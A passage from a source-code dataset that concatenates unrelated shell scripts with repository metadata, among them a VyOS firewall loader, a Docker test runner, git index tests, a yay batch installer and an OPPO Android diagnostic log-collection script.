pipeline="$(IFS='|' && echo "${pipeline_commands[*]}")"
eval "$pipeline" || exit_code="$?"
if (( "${exit_code-0}" > 1 ))
then
exit "$exit_code"
fi
| true |
da89b7bdd5dc717e59cc3d3babedc0c845ff814f | Shell | lina-taso/vyos-shellapi | /set-firewall-IPaddrlist.sh | UTF-8 | 1,168 | 3.234375 | 3 | [] | no_license | #!/bin/sh
NODE="firewall group network-group JP"
LEAF="network"
# environments
SHELL_API=/bin/cli-shell-api
vyatta_sbindir=/opt/vyatta/sbin
SET=${vyatta_sbindir}/my_set
DELETE=${vyatta_sbindir}/my_delete
COPY=${vyatta_sbindir}/my_copy
MOVE=${vyatta_sbindir}/my_move
RENAME=${vyatta_sbindir}/my_rename
ACTIVATE=${vyatta_sbindir}/my_activate
DEACTIVATE=${vyatta_sbindir}/my_activate
COMMENT=${vyatta_sbindir}/my_comment
COMMIT=${vyatta_sbindir}/my_commit
DISCARD=${vyatta_sbindir}/my_discard
SAVE=${vyatta_sbindir}/vyatta-save-config.pl
# setup session
session_env=$($SHELL_API getSessionEnv $PPID)
eval $session_env
${SHELL_API} setupSession
# config set
$DELETE $NODE
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Deleted existing JP node"
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Adding JP node"
LINE=0
while read x; do
$SET $NODE $LEAF $x
LINE=$((LINE+1))
[ $(($LINE % 100)) == 0 ] && echo "[`date +'%Y/%m/%d %H:%M:%S'`] $LINE lines were read"
done
echo "[`date +'%Y/%m/%d %H:%M:%S'`] $LINE lines were read"
# config commit/save
$COMMIT
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Added JP node and changes are commited"
$SAVE
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Saved"
| true |
f11fde23f0b485eeb71498fa37b2923322fbc8db | Shell | matiux/php-design-patterns | /docker/php/conf/xdebug-starter.sh | UTF-8 | 638 | 3.28125 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
# if `XDEBUG_HOST_IP` is manually configured as env
XDEBUG_HOST="$HOST_IP"
# try to get the ip of the host from ns host.docker.internal
if [[ -z "$XDEBUG_HOST" ]]; then
XDEBUG_HOST=$(getent hosts host.docker.internal | awk '{ print $1 }')
fi
# try to get the linux host ip
if [[ -z "$XDEBUG_HOST" || "$XDEBUG_HOST" == "127.0.0.1" ]]; then
XDEBUG_HOST=$(ip route | awk 'NR==1 {print $3}')
fi
#sed -i "s/xdebug\.client_host=.*/xdebug\.client_host=${XDEBUG_HOST}/" /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini
sed -i "s/xdebug\.client_host=.*/xdebug\.client_host=${XDEBUG_HOST}/" "${XDEBUG_CONF_FILE}" | true |
2b654508790d95e92230ee07a5ef6b3966e1ad0e | Shell | LiCijun/cmd | /yay-file | UTF-8 | 5,118 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env bash
#
# SPDX-License-Identifier: GPL-3.0-or-later
set -euo pipefail
#set -x
#set -x 将在命令执行前打印出命令 方便调试
set -e
# -e 遇到错误将停止
set -o pipefail
# pipefail set -e有一个例外情况,就是不适用于管道命令。所谓管道命令,就是多个子命令通过管道运算符(|)组合成为一个大的命令。Bash 会把最后一个子命令的返回值,作为整个命令的返回值。也就是说,只要最后一个子命令不失败,管道命令总是会执行成功,因此它后面命令依然会执行,set -e就失效了。
set -u
# -u 遇到不存在的变量 将报错
## 写法一
#set -euxo pipefail
## 写法二
#set -eux
#set -o pipefail
#这两种写法建议放在所有 Bash 脚本的头部。另一种办法是在执行 Bash 脚本的时候,从命令行传入这些参数。
#$ bash -euxo pipefail script.sh
function saveres()
{
resfilename=$1
resappname=$2
rescmdecho=$3
echo $resappname >> $resfilename
echo $resappname >> $resfilename-detail
echo $rescmdecho >> $resfilename-detail
echo $resappname >> $resfilename-detail
echo >> $resfilename-detail
}
function yayapp()
{
appname=$1
# echo install Start app name : $appname
set +e
#cmdecho=$(yay --noconfirm --needed -S $appname >/dev/null 2>&1)
#cmdecho=$(yay --noconfirm --needed -S $appname 2> /dev/stdout)
cmdecho=$(yay --noconfirm --needed -S $appname 1>&1 2>&1)
#cmdecho=$(yay --noconfirm --needed -S $appname 1>/dev/null 2>&1)
apperr=$?
set -e
if [ $apperr -eq 0 ] ; then
saveres $filename-OK $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "下载源文件时出错"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-DownError $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "包冲突无法通过 noconfirm 解决,正在中止|检测到未解决的软件包冲突"
err=$?
set -e
# echo check-string 检测到未解决的软件包冲突 $err
if [ $err -eq 0 ]
then
saveres $filename-Confirm $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "生成时出错:"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-BuildError $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "status 429: Rate limit reached"
err=$?
set -e
if [ $err -eq 0 ]
then
echo $cmdecho
else
set +e
check-string-contain "$cmdecho" "错误:无法锁定数据库"
err=$?
set -e
if [ $err -eq 0 ]
then
echo 错误:无法锁定数据库
else
set +e
check-string-contain "$cmdecho" "找不到所有需要的包:"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-needapp $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "错误:无法准备事务处理 (无法满足依赖关系)"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-dependencyError $appname "$cmdecho"
else
echo yay Result [$appname]:$cmdecho
saveres $filename-$apperr $appname "$cmdecho"
fi
fi
fi
fi
fi
fi
fi
fi
# echo $cmdecho
# echo install Over app name : $appname error code $apperr
echo >&6 # 执行完一条命令会将令牌放回管道
}
if [ $# -gt 1 ] #判断左边是否大于右边的值,大于则返回true,否则返回false
then
thread=$2
else
thread=30
fi
echo Thread Count is : $thread
check-param-num $# 1 请输入需要安装的文件名
if [ ! -f "$1" ]; then
echo 输入的文件不存在
else
tmp_fifofile=$(mktemp -u)
#echo $tmp_fifofile
mkfifo $tmp_fifofile
exec 6<>$tmp_fifofile # 创建文件描述符,以可读(<)可写(>)的方式关联管道文件,这时候文件描述符3就有了有名管道文件的所有特性
rm $tmp_fifofile # 关联后的文件描述符拥有管道文件的所有特性,所以这时候管道文件可以删除,我们留下文件描述符来用就可以了
for ((i=0;i<$thread;i++));do
echo >&6
done
filename=$1
for line in $(<$filename);
do
set +e
sleep 1s
# err=$?
# if [ $err -ne 0 ]
# then
# echo sleep err:$err
# fi
set -e
read -u6 # read 命令每次读取一行,也就是拿到一个令牌
yayapp $line &
done
wait
exec 6>&- # 关闭文件描述符的写
exec 6<&- # 关闭文件描述符的读
fi
| true |
536cd665a39b0bfc592083c4c6892d83f5f002ba | Shell | isabella232/infrastructure-reference | /infrastructure-modules/qa/instance-pool/scripts/download-registry-certificates.sh | UTF-8 | 1,527 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | #######################################################################
# This script is an additional user-data script for modules that require
# registry certificates
# NOTE: This is not a standalone script and is to be used with
# combination of the bootstrap-user-data script.
#######################################################################
# aws_region variable from bootstrap-user-data.sh
regCertDir="/etc/registry-certificates"
mkdir -m 700 -p ${regCertDir}
cd ${regCertDir}
regCertFile="docker-registry/registry-certificates/ca.pem"
resource="/${configBucket}/${regCertFile}"
create_string_to_sign
signature=$(/bin/echo -n "$stringToSign" | openssl sha1 -hmac ${s3Secret} -binary | base64)
debug_log
curl -s -L -O -H "Host: ${configBucket}.s3-${aws_region}.amazonaws.com" \
-H "Content-Type: ${contentType}" \
-H "Authorization: AWS ${s3Key}:${signature}" \
-H "x-amz-security-token:${s3Token}" \
-H "Date: ${dateValue}" \
https://${configBucket}.s3-${aws_region}.amazonaws.com/${regCertFile}
# if ca.pem file is downloaded and is a valid certificate copy to docker registry certificate location
# else delete the downloaded files
if [ -f ${regCertDir}/ca.pem ] && grep -q "BEGIN CERTIFICATE" ${regCertDir}/ca.pem ;
then
dockerCertDir="/etc/docker/certs.d/registry.${stackName}.local:80/"
mkdir -p ${dockerCertDir}
#NOTE: Rename the ca.pem file to ca.crt
mv ${regCertDir}/ca.pem ${regCertDir}/ca.crt
cp ${regCertDir}/ca.crt ${dockerCertDir}/ca.crt
else
rm -f ${regCertFile}/*
fi
| true |
5b78abd3c60509effb765a4b1fbb78b3ba5db410 | Shell | hmcts/cmc-citizen-frontend | /bin/run-nightly-tests.sh | UTF-8 | 813 | 3.0625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -ex
if [[ ${TEST_URL} = *"sprod"* ]]; then
echo "Not running functional tests on sprod, due to pay being skipped"
exit 0
fi
ADDITIONAL_COMPOSE_FILE="docker-compose.nightly-functional-tests.yml -f docker-compose.yml"
function shutdownDocker() {
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} down
}
trap shutdownDocker INT TERM QUIT EXIT
docker-compose --version
if [[ "${1}" != "--no-build" ]]; then
# Docker hub is slow to build we should always be using the latest version here
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} build citizen-integration-tests
fi
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} up --no-color -d remote-webdriver
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} run -u `id -u $USER` citizen-integration-tests
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} down
| true |
bedf1cc5542c605b53278d3c4c2cc3652612f116 | Shell | DamienRobert/dotfiles | /user/maint/misc/old/01_updateallcomptes | UTF-8 | 463 | 3.3125 | 3 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | #!/bin/zsh
# Launch 00update on computers
. $HOME/.initvars
CFGFILESNAME="${CFGFILES#$HOME/}"
eval $($MYCOMPUTERS -l --export)
COMPUTERS=($TOUNISON)
for comp in $COMPUTERS; do
eval $($MYCOMPUTERS --export $comp)
echo "-- $comp --"
ssh2 $COMPUTER[sshu] cat .initvars | grep MYHOST
done
echo "Update config files? (Press a key to continue)"
read a
for comp in $COMPUTERS; do
echo "-- $comp --"
ssh2 $COMPUTER[sshu] $CFGFILESNAME/generate.rb --all
done
| true |
0de4d60c3702ffd3351d7e22f2a4453664fab3b0 | Shell | ghuntley/monorepo | /third_party/git/t/t1600-index.sh | UTF-8 | 1,769 | 3.046875 | 3 | [
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"LGPL-2.1-only",
"GPL-3.0-only",
"GPL-2.0-only",
"MIT"
] | permissive | #!/bin/sh
test_description='index file specific tests'
. ./test-lib.sh
test_expect_success 'setup' '
echo 1 >a
'
test_expect_success 'bogus GIT_INDEX_VERSION issues warning' '
(
rm -f .git/index &&
GIT_INDEX_VERSION=2bogus &&
export GIT_INDEX_VERSION &&
git add a 2>&1 | sed "s/[0-9]//" >actual.err &&
sed -e "s/ Z$/ /" <<-\EOF >expect.err &&
warning: GIT_INDEX_VERSION set, but the value is invalid.
Using version Z
EOF
test_i18ncmp expect.err actual.err
)
'
test_expect_success 'out of bounds GIT_INDEX_VERSION issues warning' '
(
rm -f .git/index &&
GIT_INDEX_VERSION=1 &&
export GIT_INDEX_VERSION &&
git add a 2>&1 | sed "s/[0-9]//" >actual.err &&
sed -e "s/ Z$/ /" <<-\EOF >expect.err &&
warning: GIT_INDEX_VERSION set, but the value is invalid.
Using version Z
EOF
test_i18ncmp expect.err actual.err
)
'
test_expect_success 'no warning with bogus GIT_INDEX_VERSION and existing index' '
(
GIT_INDEX_VERSION=1 &&
export GIT_INDEX_VERSION &&
git add a 2>actual.err &&
test_must_be_empty actual.err
)
'
test_expect_success 'out of bounds index.version issues warning' '
(
sane_unset GIT_INDEX_VERSION &&
rm -f .git/index &&
git config --add index.version 1 &&
git add a 2>&1 | sed "s/[0-9]//" >actual.err &&
sed -e "s/ Z$/ /" <<-\EOF >expect.err &&
warning: index.version set, but the value is invalid.
Using version Z
EOF
test_i18ncmp expect.err actual.err
)
'
test_expect_success 'GIT_INDEX_VERSION takes precedence over config' '
(
rm -f .git/index &&
GIT_INDEX_VERSION=4 &&
export GIT_INDEX_VERSION &&
git config --add index.version 2 &&
git add a 2>&1 &&
echo 4 >expect &&
test-tool index-version <.git/index >actual &&
test_cmp expect actual
)
'
test_done
| true |
8d645370fc23a0ef1e37762c92f32ca004850eed | Shell | pritpane/Shell_Scripting | /For-loop3.sh | UTF-8 | 139 | 2.984375 | 3 | [] | no_license | #!/bin/bash
#for loop to create 5 files named 1-5
#Author:Pritam Nipane
#Created date:03-May-2020
#Modified:
for i in {1..5}
do
touch $i
done
| true |
0b6b75b1a83d8e54b3c9603b4530a1c8b06c8be4 | Shell | pranavramesh123/minecraft | /install.sh | UTF-8 | 1,024 | 3.828125 | 4 | [] | no_license | #! /bin/bash
#setup stuf
SERVER_FILE="server.py"
SERVICE_FILE="blocks_server.service"
DAEMON_DIR="/etc/systemd/system"
#assure we are root (as modifying system files)
if [ $EUID -ne 0 ]
then
echo "run as root"
exit
fi
#check not already installed
if [ -f $DAEMON_DIR/$SERVICE_FILE ]
then
echo "$SERVICE_FILE already exists in $DAEMON_DIR"
echo "aborting"
exit
fi
#print some log messages
echo "1: installing blocks server"
echo "2: creating service unit ($SERVICE_NAME.service) in $DAEMON_DIR"
#copy the service unit to the systemd directory
sudo cp $SERVICE_FILE $DAEMON_DIR
#append the absolute directory to the server file
echo "ExecStart=$PWD/server.py" >> $DAEMON_DIR/$SERVICE_FILE
echo "3: regenerating systemd dependency trees"
sudo systemctl daemon-reload
echo "4: install complete"
echo "use \`sudo systemctl start/stop/restart/status $SERVICE_FILE\` to control the server"
echo "note that you can drop the \`.service\` extension in the above command"
echo "please leave a star on GitHub!"
| true |
97377d56de82d8c3d1ab21b8e40ca41f61859f59 | Shell | copyit/script | /trainkids.sh | UTF-8 | 938 | 3.671875 | 4 | [] | no_license | #!/bin/bash
function jianfa() {
a=$(shuf -i 1-9 -n1) && b=$(shuf -i 1-9 -n1)
m=$(echo $a $b | tr ' ' '\n' | sort -n | tail -n1)
n=$(echo $a $b | tr ' ' '\n' | sort -n | head -n1)
suansi[i]="$m-$n="
ans[i]=$((m-n))
}
function JIAFA() {
m=$(shuf -i 1-9 -n1)
n=$(($(($RANDOM%$((10-m))))+1))
suansi[i]="$m+$n="
ans[i]=$((m+n))
}
function main() {
read -p "这次想挑战多少题目:" num </dev/tty
for ((i=0; i<num; i++)); do
pick=$(shuf -i 1-2 -n1)
[[ $pick == 1 ]] && jianfa || JIAFA
echo ${suansi[i]}
read -p "以上题目的答案是:" inputans </dev/tty
[[ $inputans == ${ans[i]} ]] && echo 答对了,继续加油哟 || i=$((i-1))
done
echo "挑战成功,太棒了!这次已经答对了$i道题目了,休息一下吧!"
}
main
#TODO
#乘除法
#自定义算式数字大小范围
#错误率过高则挑战失败
#错题回顾
| true |
ec5416985c93398696cb686f9499190f366475f4 | Shell | mhcrnl/bash2020 | /09if_else.sh | UTF-8 | 88 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env bash
# else example
if [ $# -eg 1 ]
then
nl $1
else
nl /dev/stdin
fi
| true |
080e38b2164c84e8ad3c84e017561858e7aa986d | Shell | FrictionlessCoin/p3-batchrefine | /docker/internal/p3-transformer-start.sh | UTF-8 | 502 | 2.875 | 3 | [] | no_license | #!/usr/bin/env bash
BATCHREFINE_ROOT=${BATCHREFINE_ROOT:-/batchrefine}
OPENREFINE_ROOT=${OPENREFINE_ROOT:-/OpenRefine}
REFINE_OPTIONS=${1:-''}
VERSION=`cat ${BATCHREFINE_ROOT}/version`
shift 1
echo "refine options are ${REFINE_OPTIONS}"
echo "transformer options are $@"
# Starts OpenRefine ...
${OPENREFINE_ROOT}/refine ${REFINE_OPTIONS} &
# ... and the P3 transformer.
java -jar ${BATCHREFINE_ROOT}/clients/clients-transformer/target/clients-transformer-${VERSION}-jar-with-dependencies.jar $@
| true |
cf73bb0ca8e2339cbbdb462096b4cfaf8704699d | Shell | forever361/img | /autochmod.sh | UTF-8 | 22,614 | 3.359375 | 3 | [] | no_license | #!/system/bin/sh
DATE=`date +%F-%H`
CURTIME=`date +%F-%H-%M-%S`
ROOT_AUTOTRIGGER_PATH=/sdcard/oppo_log
ROOT_TRIGGER_PATH=/sdcard/oppo_log/trigger
DATA_LOG_PATH=/data/oppo_log
CACHE_PATH=/cache/admin
config="$1"
function Preprocess(){
mkdir -p $ROOT_AUTOTRIGGER_PATH
mkdir -p $ROOT_TRIGGER_PATH
}
function log_observer(){
autostop=`getprop persist.sys.autostoplog`
if [ x"${autostop}" = x"1" ]; then
boot_completed=`getprop sys.boot_completed`
sleep 10
while [ x${boot_completed} != x"1" ];do
sleep 10
boot_completed=`getprop sys.boot_completed`
done
space_full=false
while [ ${space_full} == false ];do
sleep 60
full_date=`date +%F-%H-%M`
FreeSize=`df /data | grep /data | $XKIT awk '{print $4}'`
isM=`echo ${FreeSize} | $XKIT awk '{ print index($1,"M")}'`
if [ ${isM} = "0" ]; then
echo "$full_date left space ${FreeSize} more than 1G"
else
leftsize=`echo ${FreeSize} | $XKIT awk '{printf("%d",$1)}'`
if [ $leftsize -le 300 ];then
space_full=true
echo "$full_date leftspace $FreeSize is less than 300M,stop log" >> ${DATA_LOG_PATH}/log_history.txt
setprop persist.sys.assert.panic false
setprop ctl.stop logcatsdcard
setprop ctl.stop logcatradio
setprop ctl.stop logcatevent
setprop ctl.stop logcatkernel
setprop ctl.stop tcpdumplog
setprop ctl.stop fingerprintlog
setprop ctl.stop fplogqess
fi
fi
done
fi
}
function backup_unboot_log(){
i=1
while [ true ];do
if [ ! -d /cache/unboot_$i ];then
is_folder_empty=`ls $CACHE_PATH/*`
if [ "$is_folder_empty" = "" ];then
echo "folder is empty"
else
mv /cache/admin /cache/unboot_$i
fi
break
else
i=`$XKIT expr $i + 1`
fi
if [ $i -gt 5 ];then
break
fi
done
}
function initcache(){
panicenable=`getprop persist.sys.assert.panic`
boot_completed=`getprop sys.boot_completed`
if [ x"${panicenable}" = x"true" ] && [ x"${boot_completed}" != x"1" ]; then
if [ ! -d /dev/log ];then
mkdir -p /dev/log
chmod -R 755 /dev/log
fi
is_admin_empty=`ls $CACHE_PATH | wc -l`
if [ "$is_admin_empty" != "0" ];then
backup_unboot_log
fi
mkdir -p ${CACHE_PATH}
mkdir -p ${CACHE_PATH}/apps
mkdir -p ${CACHE_PATH}/kernel
mkdir -p ${CACHE_PATH}/netlog
mkdir -p ${CACHE_PATH}/fingerprint
setprop sys.oppo.collectcache.start true
fi
}
function logcatcache(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -f ${CACHE_PATH}/apps/android_boot.txt -r10240 -n 5 -v threadtime
fi
}
function radiocache(){
radioenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${radioenable}" = "${argtrue}" ]; then
/system/bin/logcat -b radio -f ${CACHE_PATH}/apps/radio_boot.txt -r4096 -n 3 -v threadtime
fi
}
function eventcache(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -b events -f ${CACHE_PATH}/apps/events_boot.txt -r4096 -n 10 -v threadtime
fi
}
function kernelcache(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/xbin/klogd -f ${CACHE_PATH}/kernel/kinfo_boot0.txt -n -x -l 7
fi
}
function tcpdumpcache(){
tcpdmpenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${tcpdmpenable}" = "${argtrue}" ]; then
system/xbin/tcpdump -i any -p -s 0 -W 2 -C 10 -w ${CACHE_PATH}/netlog/tcpdump_boot -Z root
fi
}
function fingerprintcache(){
cat /sys/kernel/debug/tzdbg/log > ${CACHE_PATH}/fingerprint/fingerprint_boot.txt
}
function fplogcache(){
cat /sys/kernel/debug/tzdbg/qsee_log > ${CACHE_PATH}/fingerprint/qsee_boot.txt
}
function PreprocessLog(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
boot_completed=`getprop sys.boot_completed`
decrypt_delay=0
while [ x${boot_completed} != x"1" ];do
sleep 1
decrypt_delay=`expr $decrypt_delay + 1`
boot_completed=`getprop sys.boot_completed`
done
if [ ! -d /dev/log ];then
mkdir -p /dev/log
chmod -R 755 /dev/log
fi
LOGTIME=`date +%F-%H-%M`
ROOT_SDCARD_LOG_PATH=${DATA_LOG_PATH}/${LOGTIME}
ROOT_SDCARD_apps_LOG_PATH=${ROOT_SDCARD_LOG_PATH}/apps
ROOT_SDCARD_kernel_LOG_PATH=${ROOT_SDCARD_LOG_PATH}/kernel
ROOT_SDCARD_netlog_LOG_PATH=${ROOT_SDCARD_LOG_PATH}/netlog
ROOT_SDCARD_FINGERPRINTERLOG_PATH=${ROOT_SDCARD_LOG_PATH}/fingerprint
ASSERT_PATH=${ROOT_SDCARD_LOG_PATH}/oppo_assert
TOMBSTONE_PATH=${ROOT_SDCARD_LOG_PATH}/tombstone
ANR_PATH=${ROOT_SDCARD_LOG_PATH}/anr
mkdir -p ${ROOT_SDCARD_LOG_PATH}
mkdir -p ${ROOT_SDCARD_apps_LOG_PATH}
mkdir -p ${ROOT_SDCARD_kernel_LOG_PATH}
mkdir -p ${ROOT_SDCARD_netlog_LOG_PATH}
mkdir -p ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}
mkdir -p ${ASSERT_PATH}
mkdir -p ${TOMBSTONE_PATH}
mkdir -p ${ANR_PATH}
chmod -R 777 ${ROOT_SDCARD_LOG_PATH}
echo ${LOGTIME} >> /data/oppo_log/log_history.txt
echo ${LOGTIME} >> /data/oppo_log/transfer_list.txt
decrypt=`getprop com.oppo.decrypt`
if [ x"${decrypt}" != x"true" ]; then
setprop ctl.stop logcatcache
setprop ctl.stop radiocache
setprop ctl.stop eventcache
setprop ctl.stop kernelcache
setprop ctl.stop fingerprintcache
setprop ctl.stop fplogcache
setprop ctl.stop tcpdumpcache
mv ${CACHE_PATH}/* ${ROOT_SDCARD_LOG_PATH}/
mv /cache/unboot_* ${ROOT_SDCARD_LOG_PATH}/
setprop com.oppo.decrypt true
fi
setprop com.oppo.debug.time ${LOGTIME}
fi
setprop sys.oppo.collectlog.start true
setprop sys.oppo.logkit.appslog ${ROOT_SDCARD_apps_LOG_PATH}
setprop sys.oppo.logkit.kernellog ${ROOT_SDCARD_kernel_LOG_PATH}
setprop sys.oppo.logkit.netlog ${ROOT_SDCARD_netlog_LOG_PATH}
setprop sys.oppo.logkit.assertlog ${ASSERT_PATH}
setprop sys.oppo.logkit.anrlog ${ANR_PATH}
setprop sys.oppo.logkit.tombstonelog ${TOMBSTONE_PATH}
setprop sys.oppo.logkit.fingerprintlog ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}
}
function initLogPath(){
FreeSize=`df /data | grep /data | $XKIT awk '{print $4}'`
isM=`echo ${FreeSize} | $XKIT awk '{ print index($1,"M")}'`
if [ ${isM} = "0" ]; then
androidSize=51200
androidCount=`echo ${FreeSize} 30 50 ${androidSize} | $XKIT awk '{printf("%d",$1*$2*1024*1024/$3/$4)}'`
radioSize=20480
radioCount=`echo ${FreeSize} 1 50 ${radioSize} | $XKIT awk '{printf("%d",$1*$2*1024*1024/$3/$4)}'`
eventSize=20480
eventCount=`echo ${FreeSize} 1 50 ${eventSize} | $XKIT awk '{printf("%d",$1*$2*1024*1024/$3/$4)}'`
tcpdumpSize=100
tcpdumpCount=`echo ${FreeSize} 10 50 ${tcpdumpSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
else
androidSize=20480
androidCount=`echo ${FreeSize} 30 50 ${androidSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
radioSize=10240
radioCount=`echo ${FreeSize} 1 50 ${radioSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
eventSize=10240
eventCount=`echo ${FreeSize} 1 50 ${eventSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
tcpdumpSize=50
tcpdumpCount=`echo ${FreeSize} 10 50 ${tcpdumpSize} | $XKIT awk '{printf("%d",$1*$2/$3/$4)}'`
fi
ROOT_SDCARD_apps_LOG_PATH=`getprop sys.oppo.logkit.appslog`
ROOT_SDCARD_kernel_LOG_PATH=`getprop sys.oppo.logkit.kernellog`
ROOT_SDCARD_netlog_LOG_PATH=`getprop sys.oppo.logkit.netlog`
ASSERT_PATH=`getprop sys.oppo.logkit.assertlog`
TOMBSTONE_PATH=`getprop sys.oppo.logkit.tombstonelog`
ANR_PATH=`getprop sys.oppo.logkit.anrlog`
ROOT_SDCARD_FINGERPRINTERLOG_PATH=`getprop sys.oppo.logkit.fingerprintlog`
}
function PreprocessOther(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}
GRAB_PATH=$ROOT_TRIGGER_PATH/${CURTIME}
}
function Logcat(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -f ${ROOT_SDCARD_apps_LOG_PATH}/android.txt -r${androidSize} -n ${androidCount} -v threadtime -A
fi
}
function LogcatRadio(){
radioenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${radioenable}" = "${argtrue}" ]; then
/system/bin/logcat -b radio -f ${ROOT_SDCARD_apps_LOG_PATH}/radio.txt -r${radioSize} -n ${radioCount} -v threadtime -A
fi
}
function LogcatEvent(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -b events -f ${ROOT_SDCARD_apps_LOG_PATH}/events.txt -r${eventSize} -n ${eventCount} -v threadtime -A
fi
}
function LogcatKernel(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/xbin/klogd -f - -n -x -l 7 | $XKIT tee - ${ROOT_SDCARD_kernel_LOG_PATH}/kinfo0.txt | $XKIT awk 'NR%400==0'
fi
}
function tcpdumpLog(){
tcpdmpenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${tcpdmpenable}" = "${argtrue}" ]; then
system/xbin/tcpdump -i any -p -s 0 -W ${tcpdumpCount} -C ${tcpdumpSize} -w ${ROOT_SDCARD_netlog_LOG_PATH}/tcpdump -Z root
fi
}
function grabNetlog(){
/system/xbin/tcpdump -i any -p -s 0 -W 5 -C 10 -w /cache/admin/netlog/tcpdump.pcap -Z root
}
function LogcatFingerprint(){
countfp=1
while true
do
cat /sys/kernel/debug/tzdbg/log > ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/fingerprint_log${countfp}.txt
if [ ! -s ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/fingerprint_log${countfp}.txt ];then
rm ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/fingerprint_log${countfp}.txt;
fi
((countfp++))
sleep 1
done
}
function LogcatFingerprintQsee(){
countqsee=1
while true
do
cat /sys/kernel/debug/tzdbg/qsee_log > ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/qsee_log${countqsee}.txt
if [ ! -s ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/qsee_log${countqsee}.txt ];then
rm ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/qsee_log${countqsee}.txt;
fi
((countqsee++))
sleep 1
done
}
function screen_record(){
ROOT_SDCARD_RECORD_LOG_PATH=${ROOT_AUTOTRIGGER_PATH}/screen_record
mkdir -p ${ROOT_SDCARD_RECORD_LOG_PATH}
/system/bin/screenrecord --time-limit 1800 --verbose ${ROOT_SDCARD_RECORD_LOG_PATH}/screen_record.mp4
}
function Dmesg(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}
dmesg > $ROOT_TRIGGER_PATH/${CURTIME}/dmesg.txt;
}
function Dumpsys(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_dumpsys
dumpsys > $ROOT_TRIGGER_PATH/${CURTIME}_dumpsys/dumpsys.txt;
}
function Dumpstate(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_dumpstate
dumpstate > $ROOT_TRIGGER_PATH/${CURTIME}_dumpstate/dumpstate.txt
}
function Top(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_top
top -n 1 > $ROOT_TRIGGER_PATH/${CURTIME}_top/top.txt;
}
function Ps(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_ps
ps > $ROOT_TRIGGER_PATH/${CURTIME}_ps/ps.txt;
}
function Server(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_servelist
service list > $ROOT_TRIGGER_PATH/${CURTIME}_servelist/serviceList.txt;
}
function DumpEnvironment(){
rm -rf /cache/environment
umask 000
mkdir -p /cache/environment
ps > /cache/environment/ps.txt &
mount > /cache/environment/mount.txt &
getprop > /cache/environment/prop.txt &
/system/bin/dmesg > /cache/environment/dmesg.txt &
/system/bin/logcat -d -v threadtime > /cache/environment/android.txt &
/system/bin/logcat -b radio -d -v threadtime > /cache/environment/radio.txt &
/system/bin/logcat -b events -d -v threadtime > /cache/environment/events.txt &
i=`ps | grep system_server | $XKIT awk '{printf $2}'`
ls /proc/$i/fd -al > /cache/environment/system_server_fd.txt &
ps -t $i > /cache/environment/system_server_thread.txt &
cp -rf /data/system/packages.xml /cache/environment/packages.xml
chmod +r /cache/environment/packages.xml
cat /proc/meminfo > /cache/environment/proc_meminfo.txt &
cat /d/ion/heaps/system > /cache/environment/iom_system_heaps.txt &
wait
setprop sys.dumpenvironment.finished 1
umask 077
}
function CleanAll(){
rm -rf /cache/admin
rm -rf /sdcard/oppo_log/*-*
